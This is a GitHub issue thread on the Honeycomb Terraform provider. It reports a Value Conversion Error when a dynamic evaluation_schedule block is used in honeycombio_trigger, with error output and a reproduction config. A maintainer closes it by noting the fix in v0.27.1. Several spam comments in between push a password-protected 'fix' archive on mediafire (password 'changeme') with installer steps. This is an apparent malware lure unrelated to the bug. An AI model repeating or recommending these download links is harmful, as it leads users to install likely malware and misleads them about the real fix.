### ISSUE TITLE
Value Conversion Error using a dynamic block on evaluation_schedule in honeycombio_trigger resource

### ISSUE THREAD

**Issue by rutomo-humi** [honeycombio/terraform-provider-honeycombio#537]
Terraform Validate/Plan receives the following Value Conversion Error whenever I tried to use dynamic block on evaluation_schedule in `honeycombio_trigger`

```
terraform init && terraform plan
Initializing the backend...
Initializing provider plugins...
- Reusing previous version of honeycombio/honeycombio from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed honeycombio/honeycombio v0.27.0
- Using previously-installed hashicorp/aws v5.64.0

Terraform has been successfully initialized!

You may now begin working with Terraform. Try running "terraform plan" to see
any changes that are required for your infrastructure. All Terraform commands
should now work.

If you ever set or change modules or backend configuration for Terraform,
rerun this command to reinitialize your working directory. If you forget, other
commands will detect it and remind you to do so if necessary.
╷
│ Error: Value Conversion Error
│ 
│   with honeycombio_trigger.this,
│   on main.tf line 44, in resource "honeycombio_trigger" "this":
│   44: resource "honeycombio_trigger" "this" {
│ 
│ An unexpected error was encountered trying to build a value. This is always an error in the provider.
│ Please report the following to the provider developer:
│ 
│ Received unknown value, however the target type cannot handle unknown values. Use the corresponding
│ `types` package type or a custom type that handles unknown values.
│ 
│ Path: evaluation_schedule
│ Target Type: []models.TriggerEvaluationScheduleModel
│ Suggested Type: basetypes.ListValue
╵
```

```
terraform validate
╷
│ Error: Value Conversion Error
│ 
│   with honeycombio_trigger.this,
│   on main.tf line 44, in resource "honeycombio_trigger" "this":
│   44: resource "honeycombio_trigger" "this" {
│ 
│ An unexpected error was encountered trying to build a value. This is always an error in the provider.
│ Please report the following to the provider developer:
│ 
│ Received unknown value, however the target type cannot handle unknown values. Use the corresponding
│ `types` package type or a custom type that handles unknown values.
│ 
│ Path: evaluation_schedule
│ Target Type: []models.TriggerEvaluationScheduleModel
│ Suggested Type: basetypes.ListValue
```
**Versions**
This affects honeycombio provider version `0.24.0` or higher. We were on `0.21.0` and was only able to update to version 0.23.0 as we keep running into the `Value Conversion Error`.

```
terraform --version
Terraform v1.9.3
on darwin_arm64
+ provider registry.terraform.io/hashicorp/aws v5.64.0
+ provider registry.terraform.io/honeycombio/honeycombio v0.27.0
```

**Steps to reproduce**
``` hcl
locals {
  dataset = "dataset"
  business_hour = {
    start_time = "14:00" # 9:00 EST
    end_time   = "22:00" # 17:00 EST
    days_of_week = [
      "monday",
      "tuesday",
      "wednesday",
      "thursday",
      "friday",
    ]
  }
}

variable "enable_evaluation_schedule_business_hour" {
  type    = bool
  default = true
}

resource "honeycombio_query" "this" {
  dataset    = local.dataset
  query_json = data.honeycombio_query_specification.this.json
}

resource "honeycombio_trigger" "this" {
  name = "test-trigger"

  query_id = honeycombio_query.this.id
  dataset  = local.dataset

  threshold {
    exceeded_limit = 1
    op             = ">"
    value          = "0"
  }

  dynamic "evaluation_schedule" {
    for_each = var.enable_evaluation_schedule_business_hour ? [true] : []

    content {
      start_time   = local.business_hour.start_time
      end_time     = local.business_hour.end_time
      days_of_week = local.business_hour.days_of_week
    }
  }
}

terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "5.64"
    }
    honeycombio = {
      source  = "honeycombio/honeycombio"
      version = "~> 0.27.0"
    }
  }
}
```

**Additional context**

When I didn't use dynamic block for `evaluation_schedule`, it worked fine 

```
  evaluation_schedule {
    start_time   = local.business_hour.start_time
    end_time     = local.business_hour.end_time
    days_of_week = local.business_hour.days_of_week
  }
```

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mabhi02** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jharley** [comment]
The fix for this was just released in v0.27.1
